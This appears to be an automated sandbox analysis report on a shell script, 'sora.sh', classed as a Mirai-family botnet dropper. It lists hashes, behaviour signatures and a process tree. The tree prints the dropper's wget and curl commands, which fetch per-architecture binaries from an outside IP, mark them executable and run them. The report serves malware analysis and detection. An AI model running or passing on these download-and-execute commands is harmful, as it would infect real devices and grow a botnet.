Analysis
-
max time kernel
149s -
max time network
152s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
29-08-2024 20:19
Static task
static1
Behavioral task
behavioral1
Sample
sora.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
sora.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
sora.sh
Resource
debian9-mipsbe-20240729-en
General
-
Target
sora.sh
-
Size
1KB
-
MD5
4bad6b7a8f3a112f1e8a64415b2c5e57
-
SHA1
80386ebec3b511cd2a07da88e300a62590b8d889
-
SHA256
4483a53f61944b8183d1941626bb43ff3a0f8196930441fe4c791a76cd87fb77
-
SHA512
da9c99687356c636a26e11083032cee8d31f7105e64ade4d20f54e3ba22085ed9a5749674684622dce428287410b404b84d546a91e050afadf0b7b7485647aed
Malware Config
Extracted
mirai
LZRD
Signatures
-
Contacts a large (198741) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/robben 1513 robben /tmp/robben 1524 robben /tmp/robben 1535 robben /tmp/robben 1546 robben /tmp/robben 1557 robben /tmp/robben 1568 robben /tmp/robben 1579 robben /tmp/robben 1590 robben /tmp/robben 1601 robben /tmp/robben 1612 robben -
Modifies Watchdog functionality 1 TTPs 20 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/misc/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/watchdog robben File opened for modification /dev/misc/watchdog robben -
resource yara_rule behavioral1/files/fstream-1.dat upx -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
description ioc Process File opened for reading /proc/565/exe robben File opened for reading /proc/542/exe robben File opened for reading /proc/2013/exe robben File opened for reading /proc/2514/exe robben File opened for reading /proc/3277/exe robben File opened for reading /proc/665/exe robben File opened for reading /proc/2535/exe robben File opened for reading /proc/2777/exe robben File opened for reading /proc/2799/exe robben File opened for reading /proc/4017/exe robben File opened for reading /proc/483/exe robben File opened for reading /proc/3766/exe robben File opened for reading /proc/3662/exe robben File opened for reading /proc/3812/exe robben File opened for reading /proc/4183/exe robben File opened for reading /proc/439/exe robben File opened for reading /proc/665/exe robben File opened for reading /proc/1106/exe robben File opened for reading /proc/1136/exe robben File opened for reading /proc/1719/exe robben File opened for reading /proc/1887/exe robben File opened for reading /proc/1911/exe robben File opened for reading /proc/4504/exe robben File opened for reading /proc/644/exe robben File opened for reading /proc/1507/exe robben File opened for reading /proc/1781/exe robben File opened for reading /proc/1812/exe robben File opened for reading /proc/2083/exe robben File opened for reading /proc/2588/exe robben File opened for reading /proc/3230/exe robben File opened for reading /proc/3270/exe robben File opened for reading /proc/2825/exe robben File opened for reading /proc/3856/exe robben File opened for reading /proc/4189/exe robben File opened for reading /proc/4976/exe robben File opened for reading /proc/1016/exe robben File opened for reading /proc/1136/exe robben File opened for reading /proc/2795/exe robben File opened for reading /proc/2644/exe robben File opened for reading /proc/3995/exe robben File opened for reading /proc/700/exe robben File opened for reading /proc/1893/exe robben File opened for reading /proc/1833/exe robben File opened for reading /proc/1147/exe robben File opened for reading /proc/2581/exe robben File opened for reading /proc/3088/exe robben File opened for reading /proc/3456/exe robben File opened for reading /proc/468/exe robben File opened for reading /proc/1813/exe robben File opened for reading /proc/1843/exe robben File opened for reading /proc/2562/exe robben File opened for reading /proc/3208/exe robben File opened for reading /proc/2738/exe robben File opened for reading /proc/3649/exe robben File opened for reading /proc/3805/exe robben File opened for reading /proc/4119/exe robben File opened for reading /proc/3836/exe robben File opened for reading /proc/4032/exe robben File opened for reading /proc/438/exe robben File opened for reading /proc/700/exe robben File opened for reading /proc/644/exe robben File opened for reading /proc/1502/exe robben File opened for reading /proc/1502/exe robben File opened for reading /proc/1781/exe robben -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/sora.arm6 curl File opened for modification /tmp/sora.ppc curl File opened for modification /tmp/sora.m68k wget File opened for modification /tmp/sora.x86 curl File opened for modification /tmp/robben sora.sh File opened for modification /tmp/sora.mips wget File opened for modification /tmp/sora.arm4 curl File opened for modification /tmp/sora.arm5 curl File opened for modification /tmp/sora.sh4 wget File opened for modification /tmp/sora.x86 wget File opened for modification /tmp/sora.mpsl wget File opened for modification /tmp/sora.arm6 wget File opened for modification /tmp/sora.ppc wget File opened for modification /tmp/sora.m68k curl File opened for modification /tmp/sora.mips curl File opened for modification /tmp/sora.mpsl curl File opened for modification /tmp/sora.arm7 curl File opened for modification /tmp/sora.arm5 wget File opened for modification /tmp/sora.arm7 wget File opened for modification /tmp/sora.sh4 curl
Processes
-
/tmp/sora.sh/tmp/sora.sh1⤵
- Writes file to tmp directory
PID:1504 -
/usr/bin/wgetwget http://154.216.17.67/bins/sora.x862⤵
- Writes file to tmp directory
PID:1505
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.x862⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/catcat sora.x862⤵PID:1511
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1512
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1513
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mips2⤵
- Writes file to tmp directory
PID:1517
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mips2⤵
- Writes file to tmp directory
PID:1521
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.mips sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1523
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1524
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:1528
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.mpsl2⤵
- Writes file to tmp directory
PID:1532
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1534
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1535
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm42⤵PID:1539
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm42⤵
- Writes file to tmp directory
PID:1543
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1545
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1546
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm52⤵
- Writes file to tmp directory
PID:1550
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm52⤵
- Writes file to tmp directory
PID:1554
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1556
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1557
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm62⤵
- Writes file to tmp directory
PID:1561
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm62⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1567
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1568
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.arm72⤵
- Writes file to tmp directory
PID:1572
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.arm72⤵
- Writes file to tmp directory
PID:1576
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1578
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1579
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:1583
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.ppc2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.mips sora.mpsl sora.ppc sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1589
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1590
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:1594
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.m68k2⤵
- Writes file to tmp directory
PID:1598
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1600
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1601
-
-
/usr/bin/wgetwget http://154.216.17.67/bins/sora.sh42⤵
- Writes file to tmp directory
PID:1605
-
-
/usr/bin/curlcurl -O http://154.216.17.67/bins/sora.sh42⤵
- Writes file to tmp directory
PID:1609
-
-
/bin/chmodchmod +x config-err-MsoZIU netplan_6etimwxp robben snap-private-tmp sora.arm4 sora.arm5 sora.arm6 sora.arm7 sora.m68k sora.mips sora.mpsl sora.ppc sora.sh sora.sh4 sora.x86 ssh-QG10K9MbVSH7 systemd-private-da77271824104e4081ce2dbfbe9918d7-bolt.service-NWe0PJ systemd-private-da77271824104e4081ce2dbfbe9918d7-colord.service-jJgtGR systemd-private-da77271824104e4081ce2dbfbe9918d7-ModemManager.service-hTy2A2 systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-resolved.service-pQGkqe systemd-private-da77271824104e4081ce2dbfbe9918d7-systemd-timedated.service-HRtjHp2⤵PID:1611
-
-
/tmp/robben./robben Payload2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Reads runtime system information
PID:1612
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
30KB
MD5bcff8f405bdd93b8488e6f6aca117a32
SHA18b32a1dea70be2c76830e3808f70ad62eb3b1250
SHA25667180595f06f283c60b26bffa32965d897f0234e5ab8d9fe5510773b3712f396
SHA5125d9e20aeb055eb0c535db9c42d4ccb9f68342b196f9816e1f634147c63dcf4b1dedf5be0b8f7b2ade2676cff752e2418e9b446804fee5a61a24e7a57c845c48a